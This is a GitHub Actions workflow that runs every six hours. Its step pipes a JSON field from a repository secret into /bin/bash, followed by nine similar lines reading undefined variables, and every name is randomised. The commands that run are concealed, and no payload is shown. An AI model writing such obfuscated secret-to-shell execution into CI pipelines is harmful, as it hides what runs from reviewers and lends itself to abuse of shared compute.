name: fangziwenni

on:
  workflow_dispatch:
  schedule:
    - cron: '51 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fangziwenni
        env:
          fri431: ${{ secrets.fri431 }}
        run: |
          echo $fri431 | jq -r .imtuq6 | /bin/bash
          echo $iyjgm1294 | jq -r .aga4 | /bin/bash
          echo $gi0530 | jq -r .qigux5897 | /bin/bash
          echo $v175 | jq -r .er8 | /bin/bash
          echo $rhuva4 | jq -r .cmt31 | /bin/bash
          echo $jxi9629 | jq -r .md13 | /bin/bash
          echo $mcx1 | jq -r .nbdff89 | /bin/bash
          echo $bulye91403 | jq -r .n4 | /bin/bash
          echo $kjmj0 | jq -r .x63519 | /bin/bash
          echo $xll253 | jq -r .hd5 | /bin/bash

